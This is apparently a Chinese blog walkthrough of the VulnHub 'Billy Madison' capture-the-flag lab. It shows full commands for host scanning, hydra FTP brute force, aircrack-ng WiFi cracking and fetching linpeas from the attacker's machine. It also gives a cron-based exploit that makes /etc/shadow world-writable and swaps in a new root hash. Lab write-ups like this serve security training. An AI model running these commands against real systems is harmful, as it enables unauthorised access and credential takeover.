vulnhub-wp Billy Madison

这篇具有很好参考价值的文章主要介绍了vulnhub-wp Billy Madison。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

🖳 主机发现

熟悉的netdiscover -r

─$ sudo netdiscover -r 192.168.234.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts                                
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                   
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.234.45  00:0c:29:1f:87:52      1      60  VMware, Inc.                                    
 192.168.234.196 20:1e:88:ad:fc:55      1      60  Intel Corporate                                 
 192.168.234.177 c6:62:32:b7:68:66      1      60  Unknown vendor  

目标机器是192.168.134.45

👁 服务扫描

使用nmap对其进行扫描

sudo nmap -p- 192.168.234.45 --min-rate 8000 
  • --min-rate 设置最小发包速度为8000,在靶场环境可以快速扫描出结果

🚪🚶 获取权限

一个个探测,经过尝试,smb服务中有一个txt文件,里面提示我们eric的后门以及关闭了。

23端口用telnet连接后,给了我们一个提示

telnet 192.168.234.45 23
***** HAHAH! You're banned for a while, Billy Boy!
By the way, I caught you trying to hack my wifi - but the joke's on you!
I don't use ROTten passwords like rkfpuzrahngvat anymore!
Madison Hotels is as good as MINE!!!! *****

这里给了一个rot13加密的一个字符串

经过尝试后,这个解密后的字符串是一个web页面的路径

从这个页面我们可以得到的信息有:

  • veronica使用她的名字作为密码
  • 有一个流量文件在这个路径下,也使用的和veronica相关的名字

那我们先得到一个关于veronica的字典

cat /usr/share/wordlists/rockyou.txt | grep veronica > pass.txt

使用dirbuster进行爆破

从这个流量文件中,我们可以分析出俩个重要信息

  • eric在机器上有一个ftp账号
  • 该机器的ftp使用了knock服务,需要以一个特定序列进行"敲门"后才会开放



注:knock服务科普
无需多言,我们敲门

注:若是登录ftp的时候报错有关passive的话先输入passive命令进入passive mode

登录上ftp服务器后,在eric的目录下找到一个.note文件,里面记载了一个后门的打开方法,以及eric的ssh密码在veronica或者billy的目录下。我们爆破一下veronica的ftp试试

hydra -l veronica -P pass.txt 192.168.234.45 ftp


登录上veronica后,我们可以找到一个eml文件和一个cap流量文件,把他下载下来分析一下后发现流量是wifi流量,邮件中也提到了这一点。而wifi的密码就是eric的ssh密码

那我们用aircrack-ng爆破一下wifi密码试试

aircrack-ng eg-01.cap -w /usr/share/wordlists/rockyou.txt


在爆破的同时,我们也发送一下邮件,激活后门

telnet 192.168.234.45 2525


现在我们再进行一个nmap扫描,查看是否有新的服务开启

sudo nmap -p- -sV 192.168.234.45 --min-rate 10000


我们可以使用eric:triscuit* 去ssh连接

🛡️ 提升权限

我们在本地开启python的web服务,然后在靶机上用wget下载辅助提权脚本

kali:
python3 -m http.server 80

eric@BM:/tmp$ wget http://192.168.234.130/linpeas.sh
--2023-12-03 06:56:14--  http://192.168.234.130/linpeas.sh
Connecting to 192.168.234.130:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 847815 (828K) [text/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh               100%[==================================>] 827.94K  --.-KB/s    in 0.01s   

2023-12-03 06:56:14 (56.4 MB/s) - ‘linpeas.sh’ saved [847815/847815]

eric@BM:/tmp$ chmod +x linpeas.sh 

运行脚本之后,我们可以找到一个有趣的文件

我们从整个eric的攻击流程可以知道他使用了一个钓鱼的手法让veronica下载了一个恶意文件,我们可以检查一下这个文件的md5值

eric@BM:/tmp$ md5sum /usr/local/share/sgml/donpcgd
cd3621324a40c20e54aad9ecef2f6ed5  /usr/local/share/sgml/donpcgd


我们用google搜索dgcpnod后即可发现这个exploit的利用方法

而具体的exp如下

eric@BM:/tmp$ touch /tmp/rootme; chmod +x /tmp/rootme; /usr/local/share/sgml/donpcgd /tmp/rootme /etc/cron.hourly/rootme; echo -e '#!/bin/bash \n chmod 777 /etc/shadow' > /etc/cron.hourly/rootme
#### mknod(/etc/cron.hourly/rootme,81fd,0)

然后我们可以用watch命令监察/etc/shadow

watch -n 5 "ls -la /etc/shadow"
  • -n 指定每次监察间隔

    这时我们就可以修改shadow文件来提权(稳妥起见可以先对shadow文件进行备份,不管是修改shadow文件还是passwd文件,原理都是一样的)
    第一步:生成密码
mkpasswd -m sha-512 root 
  • -m 加密指定模式

    第二步:将原来的hash值或者x(passwd文件)替换为我们生成的hash值

    至此,提权成功,使用su切换到root用户

📖 推荐文章

Billy Madison下载
ftp的passive模式
youtube视频 wp

更多文章请访问我的博客rightevil.github.io文章来源地址https://www.toymoban.com/news/detail-755610.html

到了这里,关于vulnhub-wp Billy Madison的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • vulnhub靶场实战系列(一)之vulnhub靶场介绍

    Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚机到获取操作系统的root权限和查看flag。 我们在学

    2024年02月10日
    浏览(41)
  • [wp]“古剑山”第一届全国大学生网络攻防大赛 Web部分wp

    群友说是原题杯 哈哈哈哈 我也不懂 我比赛打的少  Web | unse 源码: 先伪协议读取test.php 然后得到反序列化源码: a中的$this-a触发bgood中的__toString方法,将$this-a赋值为new bfun()。 bdun中的$items[‘dd’]触发cfun中的__get函数,给$items[‘dd’]赋值为new cfun()。 最后让cdun中的$params[‘

    2024年02月04日
    浏览(58)
  • CTFshow-菜狗杯WP

    经过了48小时的奋战,在这次比赛中成功拿下4400分,同时也发现了自己的许多不足; 杂项签到 下载附件后进行解压,发现是一张图片,通过二进制查看工具(WinHex/010 Editor)打开该图片,Ctrl+F搜索文本\\\"ctfshow\\\",即可发现: ctfshow{a62b0b55682d81f7f652b26147c49040} 损坏的压缩包 通过

    2024年02月08日
    浏览(41)
  • 【HDCTF2023】wp

    web Welcome To HDCTF 2023 在源码的 game.js 中找到了flag 在控制台输出 console.log(seeeeeeeecret) 得flag SearchMaster 使用dirmap扫描目录,发现: composer.json ,访问一下: 发现是 php smarty模板注入 提示我们需要使用post方式上传一个名为 data的变量: 测试一下确实有回显: 直接读flag: YamiYami

    2024年02月01日
    浏览(69)
  • OtterCTF—内存取证wp

    目录 前言 一、工具说明 二、题目解析 1.What the password? 2.General Info 3.Play Time 4.Name Game 5.Name Game 2 6.Silly Rick 7.Hide And Seek 8.Path To Glory 9.Path To Glory 2 10.Bit 4 Bit 11.Graphic\\\'s For The Weak 12.Recovery 13.Closure 总结 前几天有幸参加了本市的选拔赛,其中有内存取证的题,当时就愣住了,考完后

    2024年02月08日
    浏览(42)
  • NISACTF2023 WP

    2年多没玩CTF了,pwn显得手生了不少,我的PWN环境已经在硬盘的某个角落里吃灰了。今天参加了一场校赛,捣鼓了一下午,Reverse和PWN都AK了。其实比赛是新手向,没啥难度,不过有道PWN设计的比较巧妙,got了两个tips,也就是今天将要分享的。 64位程序,只开启了栈不可执行保

    2023年04月17日
    浏览(96)
  • ctfshow新手杯wp

    最近国庆在疯玩的时候抽空做了几题,简单记录一下。 打开题目发现,点击不了,打开F12控制台发现flag: 题目是一个带密码的压缩包,提示说密码为纯大小写。用工具爆破了一下午没有结果,本来干脆不做了,后面打开文件发现备注:阿尼亚会PINyin:哇库哇库! 直接尝试出

    2023年04月25日
    浏览(42)
  • ACTF 2023 部分WP

    来自密码手的哀嚎: 玩不了一点,太难了。 Description Malin’s Diffile-Hellman Key Exchange. task.sage output.txt 分析一下: shared = (sk_alice[0].T * pk_bob * sk_alice[1]).trace() 也就是说 shared = ((a 1 ) T  * b 1 * (b 2 ) T * a 2 ).trace() 已知 Pk_alice = a 1 * (a 2 ) T 和 Pk_bob = b 1 * (b 2 ) T 线性代数学的好的

    2024年02月06日
    浏览(41)
  • 羊城杯2023 部分wp

    目录 D0n\\\'t pl4y g4m3!!!(php7.4.21源码泄露pop链构造) Serpent(pickle反序列化python提权) ArkNights(环境变量泄露) Ez_misc(win10sinpping_tools恢复) 访问/p0p.php 跳转到了游戏界面 应该是存在302跳转 burp抓包 提示 /hint.zip 下载下来得到一段密文: Ö 0 0vO Ow0 0w0 Ö 0 Ö O Ö.O o_o 0.O OvO o.0 owo o.Ö Ö.Ö Ovo

    2024年02月09日
    浏览(27)
  • 校内赛WP

    Web题目镜像如下: 通过location跳转了,所以你看不到第一个进入的页面,通过Burpsuite拦截或者直接F12进行包记录都可以看到flag 题目源码: 一道简单的sql注入题,没有任何过滤,注入方式也是多种多样,登录处还有弱口令,以下提供多种解。 登录框,可以直接使用admin admin弱

    2024年02月03日
    浏览(65)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包